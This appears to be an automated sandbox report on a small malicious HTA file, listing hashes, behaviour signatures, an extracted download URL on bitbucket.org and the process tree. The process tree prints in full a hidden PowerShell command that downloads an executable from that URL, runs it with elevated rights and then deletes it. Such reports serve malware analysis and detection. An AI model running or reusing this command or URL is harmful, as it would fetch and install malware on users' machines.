Analysis
-
max time kernel
120s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
03-01-2025 12:37
Static task
static1
Behavioral task
behavioral1
Sample
1111.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1111.hta
Resource
win10v2004-20241007-en
General
-
Target
1111.hta
-
Size
2KB
-
MD5
91b57eb5e0925c7522374b0c64902dfd
-
SHA1
437da5eb27efeb38a9b7f804066205964a345a33
-
SHA256
e5f2879072cdd3e4905f5fa8017be818d2c61f718d0fd322196e9cd54062ba4a
-
SHA512
68dc36ae7ba35fb736677a7b179cfdea7b93ff7cb95ea27ffec9bde61cfc3358148cb612a33450b2b5ce452bf47077a8ed6e6d5b497e027b05415a89ec5b76f4
Malware Config
Extracted
https://bitbucket.org/docspaceplace/test2/downloads/1.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1760 powershell.exe 6 1760 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1760 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 bitbucket.org 5 bitbucket.org 6 bitbucket.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1760 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2060 wrote to memory of 1760 2060 mshta.exe 30 PID 2060 wrote to memory of 1760 2060 mshta.exe 30 PID 2060 wrote to memory of 1760 2060 mshta.exe 30 PID 2060 wrote to memory of 1760 2060 mshta.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1111.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-